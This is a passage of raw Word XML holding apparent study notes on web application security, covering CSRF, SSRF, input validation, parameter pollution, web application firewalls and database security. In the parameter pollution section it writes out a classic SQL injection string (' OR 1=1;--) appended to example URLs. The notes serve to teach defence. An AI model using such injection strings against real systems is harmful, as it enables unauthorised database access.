        <w:t>Cross-Site Request Forgery (CSRF/XSRF):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76520047" w14:textId="3E5C6CF8" w:rsidR="00117149" w:rsidRDefault="004274F3" w:rsidP="0011714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Similar to cross-site scripting attacks but exploit a different trust relationship. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E17D123" w14:textId="4DA735FE" w:rsidR="004274F3" w:rsidRDefault="004274F3" w:rsidP="0011714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While </w:t>
      </w:r>
      <w:r w:rsidR="00CC2B08" w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XSS attacks</w:t>
      </w:r>
      <w:r w:rsidR="00CC2B08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit the trust that a user has in a website to execute code on the user’s computer, </w:t>
      </w:r>
      <w:r w:rsidR="00CC2B08" w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XSRF attacks</w:t>
      </w:r>
      <w:r w:rsidR="00CC2B08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit the trust that remote sites have in a user’s system to execute co</w:t>
      </w:r>
      <w:r w:rsidR="00BF2504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">mmands on the user’s behalf. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027914E8" w14:textId="7361796F" w:rsidR="00BF2504" w:rsidRDefault="00BF2504" w:rsidP="00BF2504">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XSRF attacks work by making the reasonable assumption that users are often logged into many different websites at the same time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEDB1E1" w14:textId="220B6475" w:rsidR="00BF2504" w:rsidRDefault="00BF2504" w:rsidP="00BF2504">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Attackers then embed code in one website that </w:t>
      </w:r>
      <w:r w:rsidR="001D61C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sends commands to a second website. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331ED99D" w14:textId="4784781B" w:rsidR="001D61C5" w:rsidRDefault="001D61C5" w:rsidP="00BF2504">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When the user </w:t>
      </w:r>
      <w:r w:rsidR="00FD5FD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>licks the link on the first site, they are unknowingly sending a command to the second site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B88BAAA" w14:textId="32B9D11D" w:rsidR="001D61C5" w:rsidRDefault="001D61C5" w:rsidP="001D61C5">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If the user happens to be logged into that second site, the command may succeed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E28F7BE" w14:textId="7CCC5BB3" w:rsidR="00FD5FD2" w:rsidRDefault="00FD5FD2" w:rsidP="00FD5FD2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Example can be the first site sending a command to a second (bank) site to transfer funds to a specific account. If the user is logged in to the bank site, then this command may execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203D1D4E" w14:textId="60EF317C" w:rsidR="00FD5FD2" w:rsidRDefault="00FD5FD2" w:rsidP="00FD5FD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These can be prevented with secure tokens</w:t>
      </w:r>
      <w:r w:rsidR="007D55E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> attackers would not know how to </w:t>
      </w:r>
      <w:r w:rsidR="00CF2994">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>embed in their own links.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A5A594" w14:textId="737E533E" w:rsidR="00CF2994" w:rsidRDefault="00CF2994" w:rsidP="00CF2994">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Another is for sites to check the referring URL in requests received from end users and only accept requests that originated for their own site. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD973BC" w14:textId="0E0D8458" w:rsidR="00CF2994" w:rsidRPr="001A77C8" w:rsidRDefault="00CF2994" w:rsidP="00CF2994">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Server-Side Request Forgery (SSRF):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49454DBA" w14:textId="3720DD46" w:rsidR="00CF2994" w:rsidRDefault="00CF2994" w:rsidP="00CF299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Exploit a similar vulnerability to CSRF</w:t>
      </w:r>
      <w:r w:rsidR="00D108F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> but instead of tricking a user’s browser to visit a URL, they trick a server into visiting a URL based</w:t>
      </w:r>
      <w:r w:rsidR="00B30A52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on user-supplied input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587248BD" w14:textId="434983A3" w:rsidR="00B30A52" w:rsidRDefault="00B30A52" w:rsidP="00B30A5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Attacks are possible when a web application accepts URLs from a user as input and then retrieves information from that URL. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0094E753" w14:textId="4A1D0966" w:rsidR="00C16989" w:rsidRDefault="00C16989" w:rsidP="00C1698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If the server has access to nonpublic URLs, an SSRF attack can unintentionally disclose that information to an attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A6D73E" w14:textId="42CC88F1" w:rsidR="00491B7E" w:rsidRPr="001A77C8" w:rsidRDefault="00491B7E" w:rsidP="00491B7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Application Security Controls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4EE856" w14:textId="4B282D92" w:rsidR="00491B7E" w:rsidRPr="001A77C8" w:rsidRDefault="00F26D63" w:rsidP="00491B7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Input Validation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2209CE" w14:textId="2C6BA9A8" w:rsidR="00F26D63" w:rsidRDefault="00953624" w:rsidP="00F26D6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Any application that allows user input should perform validation to ensure no input </w:t>
      </w:r>
      <w:r w:rsidR="00B522E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>can be used as an attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA5CFEF" w14:textId="513D9516" w:rsidR="00B522E4" w:rsidRDefault="00760D9D" w:rsidP="00760D9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most effective form of input validation uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>input whitelisting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, where the developer describes the exact type of input that is expected from the user and then verifies that the input matches that specification before passing the input to other processes or servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060B70EA" w14:textId="7438402F" w:rsidR="009527A0" w:rsidRDefault="009527A0" w:rsidP="009527A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Additionally, it is important this validation occurs on the server-side, as client-side authentication can easily be altered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F49B88B" w14:textId="08A6AEA0" w:rsidR="009527A0" w:rsidRDefault="00A250BB" w:rsidP="00A250B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Sometimes, input whitelisting may be too difficult because the required input has to many forms. So, </w:t>
      </w:r>
      <w:r w:rsidR="006A0612">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>input blacklisting</w:t>
      </w:r>
      <w:r w:rsidR="006A0612">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to make sure specific items like HTML tags or SQL commands are not </w:t>
      </w:r>
      <w:r w:rsidR="007F1D64">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>allowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A423A9" w14:textId="1611DF91" w:rsidR="007F1D64" w:rsidRPr="001A77C8" w:rsidRDefault="00F674A7" w:rsidP="00F674A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Parameter Pollution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7835069D" w14:textId="7947B4D1" w:rsidR="00F674A7" w:rsidRDefault="00393F2B" w:rsidP="00F674A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 technique used to defeat </w:t>
      </w:r>
      <w:r w:rsidR="00FE7306">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">input validation, by causing errors in the input validation mechanism </w:t>
      </w:r>
      <w:r w:rsidR="007D1A92">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00FE7306">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow </w:t>
      </w:r>
      <w:r w:rsidR="007D1A92">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>malicious commands to go through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F097C8" w14:textId="7C14E2F6" w:rsidR="007D1A92" w:rsidRDefault="007D1A92" w:rsidP="007D1A9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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564AE4DC" w14:textId="35606BC0" w:rsidR="007D1A92" w:rsidRDefault="00000000" w:rsidP="007D1A92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00CE29E8" w:rsidRPr="00ED62EF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.mc.com/account=12345</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CE29E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’ OR 1=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CE29E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1;-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CE29E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1435F108" w14:textId="4EBB603C" w:rsidR="00CE29E8" w:rsidRDefault="00CE29E8" w:rsidP="00CE29E8">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This is a URL and SQL command mixed into one which will </w:t>
      </w:r>
      <w:r w:rsidR="00375182">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>be blocked by the input validation.</w:t>
      </w:r>
      <w:r w:rsidR="00D06746">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is because the URL will go through just fine, but the SQL command will get blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0798ED9A" w14:textId="6E3F9A66" w:rsidR="00375182" w:rsidRDefault="00000000" w:rsidP="00375182">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="00A015A9" w:rsidRPr="00ED62EF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.mc.com/account=12345&amp;account=12345</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00375182">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’ OR 1=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00375182">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1;-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00375182">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE9FEC1" w14:textId="20EE406E" w:rsidR="00D06746" w:rsidRDefault="00A015A9" w:rsidP="00A015A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D06746">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This on the other hand may cause an error in the </w:t>
      </w:r>
      <w:r w:rsidR="00D06746" w:rsidRPr="00D06746">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">application because </w:t>
      </w:r>
      <w:r w:rsidRPr="00D06746">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“account=12345&amp;account=12345” </w:t>
      </w:r>
      <w:r w:rsidR="00D06746">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is allowed by the input validation but may cause bugs with the actual application. Because of this bug, the input validation could possibly not run for the SQL command part.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A01ED5C" w14:textId="0125A99E" w:rsidR="00D06746" w:rsidRDefault="00D06746" w:rsidP="00D0674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Countering this require</w:t>
      </w:r>
      <w:r w:rsidR="00267596">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s that web platforms handle multiple copies of the same parameter properly </w:t>
      </w:r>
      <w:r w:rsidR="0066172A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and handle other weird inputs yet legal inputs properly as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F85036" w14:textId="48D58E57" w:rsidR="0066172A" w:rsidRPr="001A77C8" w:rsidRDefault="0066172A" w:rsidP="0066172A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Web Application Firewalls</w:t>
      </w:r>
      <w:r w:rsidR="004F55A5" w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (WAFs)</w:t>
      </w:r>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5E219D" w14:textId="4FCEB5EB" w:rsidR="00467969" w:rsidRDefault="00397B43" w:rsidP="0046796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Work similarly to firewall</w:t>
      </w:r>
      <w:r w:rsidR="00467969">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s but operate on the Application Layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A4D1A1" w14:textId="3B7228F1" w:rsidR="00E72417" w:rsidRDefault="00E72417" w:rsidP="00E7241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lastRenderedPageBreak/>
        <w:t>They s</w:t>
      </w:r>
      <w:r w:rsidR="00B1112E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">it in front of a web server and receives all network traffic headed to that server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097A3661" w14:textId="38A6990D" w:rsidR="00B1112E" w:rsidRDefault="00B1112E" w:rsidP="00E7241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It then </w:t>
      </w:r>
      <w:r w:rsidR="000E2F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>scrutinizes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the input headed to the </w:t>
      </w:r>
      <w:r w:rsidR="000E2F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, performing input validation </w:t>
      </w:r>
      <w:r w:rsidR="000E2F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>before passing the input to the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0B6BF4" w14:textId="1F5EFA05" w:rsidR="000E2F7E" w:rsidRDefault="000E2F7E" w:rsidP="000E2F7E">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This all prevents malicious traffic from ever reaching the web server and is a good layer of defense against web app vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438A979B" w14:textId="5870C550" w:rsidR="000E2F7E" w:rsidRPr="001A77C8" w:rsidRDefault="000E2F7E" w:rsidP="000E2F7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Database Security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52142225" w14:textId="427C8B2F" w:rsidR="000E2F7E" w:rsidRDefault="001C3553" w:rsidP="000E2F7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Just secure database practices </w:t>
      </w:r>
      <w:r w:rsidR="00947543">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>as they are necessary for normal business operation and maintaining the CIA triad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFE97D9" w14:textId="05E60125" w:rsidR="00976C45" w:rsidRPr="001A77C8" w:rsidRDefault="00976C45" w:rsidP="00976C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Database Normalization:</w:t>
      </w:r>
    </w:p>
